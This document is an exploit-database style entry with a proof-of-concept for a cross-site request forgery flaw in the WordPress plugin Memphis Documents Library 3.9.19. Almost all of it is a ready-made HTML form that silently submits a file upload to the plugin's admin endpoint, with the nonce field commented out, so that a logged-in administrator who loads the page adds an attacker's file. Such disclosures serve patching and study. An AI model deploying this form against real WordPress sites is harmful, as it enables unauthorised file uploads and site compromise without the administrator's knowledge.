# Exploit Title: WordPress Plugin Memphis Documents Library 3.9.19 - Cross Site Request Forgery (Arbitrary File Add)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: May 22, 2019
# Software Link : https://wordpress.org/plugins/memphis-documents-library/
# Tested Version: 3.9.19
# Tested on: Parrot OS, Wordpress 5.1.1


# PoC:

<form class="form-horizontal" enctype="multipart/form-data" action="http://localhost/[PATH]/wp-admin/admin.php?page=memphis-documents.php&amp;mdocs-cat=&amp;mdocs-cat=mdocuments" method="POST" id="mdocs-add-update-form">
				<input type="hidden" name="mdocs-current-user" value="phpmyadmin">
				<input type="hidden" name="mdocs-type" value="mdocs-add">
				<input type="hidden" name="mdocs-index" value="">
				<input type="hidden" name="mdocs-cat" value="">
				<input type="hidden" name="mdocs-pname" value="">
				<!--<input type="hidden" name="mdocs-nonce" value="" />-->
				<input type="hidden" name="mdocs-post-status-sys" value="">
				<input type="hidden" name="mdocs-permalink" value="admin.php?page=memphis-documents.php&amp;mdocs-cat=">
				<input type="hidden" name="mdocs-is-admin" value="1">
				<div class="well well-lg">
					<div class="page-header">
						<h2>File Properties</h2>
					</div>
					<div class="form-group form-group-lg has-success">
						<label class="col-sm-2 control-label" for="mdocs-name">Name</label>
						<div class="col-sm-10">
							<input class="form-control" type="text" name="mdocs-name" id="mdocs-name">
						</div>
					</div>
					<div class="form-group form-group-lg">
						<label class="col-sm-2 control-label" for="mdocs">File Uploader</label>
						<div class="col-sm-10">
							<input class="form-control" type="file" name="mdocs">
							<p class="help-block" id="mdocs-current-doc"></p>
						</div>
					</div>
							<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-folder">Folder</label>
			<div class="col-sm-10">
					<select class="form-control" name="mdocs-cat">
	<option value="mdocuments" selected="selected">Documents</option>	</select>
				</div>
		</div>
				<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-version">Version</label>
			<div class="col-sm-10">
					<input class="form-control" type="text" name="mdocs-version" value="">
				</div>
		</div>
				<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-date">Date</label>
			<div class="col-sm-10">
					<input class="form-control" type="text" name="mdocs-last-modified" value="">
				</div>
		</div>
				<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-file status">File Status</label>
			<div class="col-sm-10">
					<select class="form-control input-lg" name="mdocs-file-status" id="mdocs-file-status">
		<option value="public">Public - [ Everyone can view this file ]</option>
		<option value="hidden">Private - [ Only you can view this file ]</option>
	</select>
				</div>
		</div>
				<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-post status">Post Status</label>
			<div class="col-sm-10">
					<select class="form-control input-lg" name="mdocs-post-status" id="mdocs-post-status">
		<option value="publish">Published</option>
		<option value="private">Private</option>
		<option value="pending">Pending Review</option>
		<option value="draft">Draft</option>
	</select>
				</div>
		</div>
				<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-show social apps">Show Social Apps</label>
			<div class="col-sm-10">
					<input class="form-control" type="checkbox" name="mdocs-social" checked="">
				</div>
		</div>
				<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-downloadable by non members">Downloadable By Non Members</label>
			<div class="col-sm-10">
					<input class="form-control" type="checkbox" name="mdocs-non-members" checked="">
				</div>
		</div>
				<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-contributors">Contributors</label>
			<div class="col-sm-10">
					<div class="mdocs-add-contributor-container" data-contributor-type="add-update">
		<div class="mdocs-contributors-container">
			<button type="button" class="btn btn-primary" id="mdocs-current-owner"><i class="fa fa-user" aria-hidden="true"></i> phpmyadmin</button>
		<input type="hidden" value="phpmyadmin" id="mdocs-owner-value"></div>
		<input autocomplete="off" class="form-control mdocs-add-contributors" type="text" name="mdocs-add-contributors" placeholder="Add contributor, users and roles types are allowed.">
		<div class="mdocs-user-search-list hidden"></div>
	</div>
				</div>
		</div>
			<input type="hidden" name="mdocs-real-author" value="">
			<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-tags">Tags</label>
			<div class="col-sm-10">
					<input class="form-control" type="text" name="mdocs-tags" id="mdocs-tags" placeholder="Comma Separated List">
				</div>
		</div>
				<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-categories">Categories</label>
			<div class="col-sm-10">
					<select multiple="" class="form-control" name="mdocs-categories[]" id="mdocs-post-categories">
		<option value="Uncategorized">Uncategorized</option>	</select>
				</div>
		</div>
				<div class="form-group form-group-lg">
			<label class="col-sm-2 control-label" for="mdocs-description">Description</label>
			<div class="col-sm-10">
				<div id="wp-mdocs-desc-wrap" class="wp-core-ui wp-editor-wrap tmce-active"><link rel="stylesheet" id="dashicons-css" href="http://localhost/lab/wordpress/wp-includes/css/dashicons.min.css?ver=5.1.1" type="text/css" media="all">
<link rel="stylesheet" id="editor-buttons-css" href="http://localhost/lab/wordpress/wp-includes/css/editor.min.css?ver=5.1.1" type="text/css" media="all">
<style>display: none;</style>
<div id="wp-mdocs-desc-editor-tools" class="wp-editor-tools hide-if-no-js"><div class="wp-editor-tabs"><button type="button" id="mdocs-desc-tmce" class="wp-switch-editor switch-tmce" data-wp-editor-id="mdocs-desc">Visual</button>
<button type="button" id="mdocs-desc-html" class="wp-switch-editor switch-html" data-wp-editor-id="mdocs-desc">Text</button>
</div>
</div>

</div>
</div>
</div>
	<input type="submit" class="btn btn-primary" id="mdocs-save-doc-btn" value="Add Document">
</form>